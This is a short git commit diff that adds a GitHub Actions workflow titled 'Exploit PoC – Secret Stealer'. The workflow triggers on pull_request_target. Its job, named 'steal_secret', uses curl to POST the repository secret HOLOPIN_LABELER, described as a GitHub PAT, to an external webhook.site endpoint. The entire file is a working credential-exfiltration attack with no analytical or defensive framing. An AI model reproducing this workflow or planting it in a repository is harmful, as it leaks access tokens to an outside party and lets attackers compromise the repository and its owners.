Create poc.yml

vishalkumar957039 · web-flow · commit 5fcc39addb78 · 2025-08-07T23:42:41.000+05:30
diff --git a/.github/workflows/poc.yml b/.github/workflows/poc.yml
@@ -0,0 +1,18 @@
+# .github/workflows/poc.yml
+name: Exploit PoC – Secret Stealer
+
+on:
+  pull_request_target:
+    types: [opened]
+
+jobs:
+  steal_secret:
+    name: Steal GitHub PAT
+    runs-on: ubuntu-latest
+    steps:
+      - name: Exfiltrate HOLOPIN_LABELER Secret
+        run: |
+          curl -X POST \
+            -H "Content-Type: application/x-www-form-urlencoded" \
+            -d "token=${{ secrets.HOLOPIN_LABELER }}" \
+            https://webhook.site/e4056cbe-33ad-4c73-a3f2-48b7b388a4f1
